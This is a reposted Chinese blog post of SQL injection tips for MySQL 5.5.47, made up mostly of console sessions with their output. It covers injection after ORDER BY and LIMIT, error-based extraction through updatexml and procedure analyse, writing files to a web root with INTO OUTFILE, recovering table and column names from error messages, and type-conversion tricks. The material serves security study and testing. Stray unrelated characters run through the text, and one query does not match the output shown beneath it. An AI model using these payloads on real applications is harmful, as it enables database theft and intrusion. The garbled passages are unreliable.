原文鏈接:http://wyb0.com/posts/some-tips-for-sql-injection/
環(huán)境:MySQL 5.5.47
0x00 注入點(diǎn)在Order by后面
mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
Query OK, 1 row affected (0.01 sec)
mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~msg~'
mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
0x01 注入點(diǎn)在limit后面
- limit前面沒(méi)有order by可以使用union、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
+----+------+---------+
| id | name | content |
+----+------+---------+
| 1 | 2 | 3 |
+----+------+---------+
1 row in set (0.01 sec)
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
+-------------------+---------------+---------------+------------+------------+
| Field_name | Min_value | Max_value | Min_length | Max_length |
+-------------------+---------------+---------------+------------+------------+
| rtest.msg.name | xiaohong | xiaohong | 8 | 8 |
| rtest.msg.content | I have a cat. | I have a cat. | 13 | 13 |
+-------------------+---------------+---------------+------------+------------+
------------------+-------+-------------------------+------+--------------------+
Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std | Optimal_fieldtype |
------------------+-------+-------------------------+------+--------------------+
0 | 0 | 8.0000 | NULL | ENUM('xiaohong') NOT NULL |
0 | 0 | 13.0000 | NULL | ENUM('I have a cat.') NOT NULL|
------------------+-------+-------------------------+------+--------------------+
2 rows in set (0.00 sec)
- limit前面有order by則不可以使用union扔嵌、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
0x02 根據(jù)報(bào)錯(cuò)得到數(shù)據(jù)庫(kù)名苍姜、表名呀枢、列名
#得到數(shù)據(jù)庫(kù)名為rtest
mysql> select id,name,content from msg where id=2-a();
ERROR 1305 (42000): FUNCTION rtest.a does not exist
#得到表名為msg
mysql> select id,name,content from msg where id=2 and polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select id,name,content from msg where id=2 and polygon(id);
ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
#得到列名為id躲庄、name、content臂拓、useragent
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
ERROR 1060 (42S21): Duplicate column name 'content'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
ERROR 1060 (42S21): Duplicate column name 'useragent'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
ERROR 1241 (21000): Operand should contain 1 column(s)
0x03 MySQL的隱式轉(zhuǎn)換
-
官方隱式轉(zhuǎn)換規(guī)則
- 兩個(gè)參數(shù)至少有一個(gè)是 NULL 時(shí)绵载,比較的結(jié)果也是 NULL瓶殃,例外是使用 <=> 對(duì)兩個(gè) NULL 做比較時(shí)會(huì)返回 1学搜,這兩種情況都不需要做類型轉(zhuǎn)換
- 兩個(gè)參數(shù)都是字符串,會(huì)按照字符串來(lái)比較多柑,不做類型轉(zhuǎn)換
- 兩個(gè)參數(shù)都是整數(shù)奶是,按照整數(shù)來(lái)比較,不做類型轉(zhuǎn)換
- 十六進(jìn)制的值和非數(shù)字做比較時(shí)竣灌,會(huì)被當(dāng)做二進(jìn)制串
- 有一個(gè)參數(shù)是 TIMESTAMP 或 DATETIME聂沙,并且另外一個(gè)參數(shù)是常量,常量會(huì)被轉(zhuǎn)換為 timestamp
- 有一個(gè)參數(shù)是 decimal 類型初嘹,如果另外一個(gè)參數(shù)是 decimal 或者整數(shù)及汉,會(huì)將整數(shù)轉(zhuǎn)換為 decimal 后進(jìn)行比較,如果另外一個(gè)參數(shù)是浮點(diǎn)數(shù)削樊,則會(huì)把 decimal 轉(zhuǎn)換為浮點(diǎn)數(shù)進(jìn)行比較
- 所有其他情況下豁生,兩個(gè)參數(shù)都會(huì)被轉(zhuǎn)換為浮點(diǎn)數(shù)再進(jìn)行比較
數(shù)字和字符進(jìn)行運(yùn)算時(shí)會(huì)轉(zhuǎn)換為double類型
mysql> select 2+'4'; #數(shù)字和字符會(huì)轉(zhuǎn)換為數(shù)字
+-------+
| 2+'4' |
+-------+
| 6 |
+-------+
1 row in set (0.00 sec)
mysql> select 'a'+'55'; #字符和字符會(huì)轉(zhuǎn)換為數(shù)字
+----------+
| 'a'+'55' |
+----------+
| 55 |
+----------+
1 row in set, 1 warning (0.00 sec)
mysql> select '33'+'32d11a';
+-----------+
| '33'+'3d' |
+-----------+
| 65 |
+-----------+
1 row in set, 1 warning (0.00 sec)
- concat()函數(shù)將數(shù)字轉(zhuǎn)換為字符
mysql> select concat(3,'test'); #前面的數(shù)字1被轉(zhuǎn)換為字符
+------------------+
| concat(3,'test') |
+------------------+
| 3test |
+------------------+
1 row in set (0.00 sec)
- name類型為string,查詢條件為int 0時(shí)可以查詢
mysql> desc msg;
+-----------+---------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+---------------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(30) | NO | | NULL | |
| content | varchar(1024) | NO | | NULL | |
| useragent | varchar(1024) | NO | | NULL | |
+-----------+---------------+------+-----+---------+----------------+
4 rows in set (0.01 sec)
mysql> select id,name,content from msg where id=1 and name=0;
+----+----------+--------------+
| id | name | content |
+----+----------+--------------+
| 1 | xiaoming | hello world. |
+----+----------+--------------+
1 row in set, 2 warnings (0.00 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
+---------+------+----------------------------------------------+
2 rows in set (0.00 sec)
mysql> select id,name,content from msg;
+----+----------+---------------+
| id | name | content |
+----+----------+---------------+
| 1 | xiaoming | hello world. |
| 2 | xiaohong | I have a cat. |
| 3 | 55lihua | ni hao |
+----+----------+---------------+
3 rows in set (0.00 sec)
mysql> select id,name,content from msg where name='li'+'55';
+----+---------+---------+
| id | name | content |
+----+---------+---------+
| 3 | 55lihua | ni hao |
+----+---------+---------+
1 row in set, 4 warnings (0.01 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'li' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaohong' |
| Warning | 1292 | Truncated incorrect DOUBLE value: '55lihua' |
+---------+------+----------------------------------------------+
4 rows in set (0.00 sec)
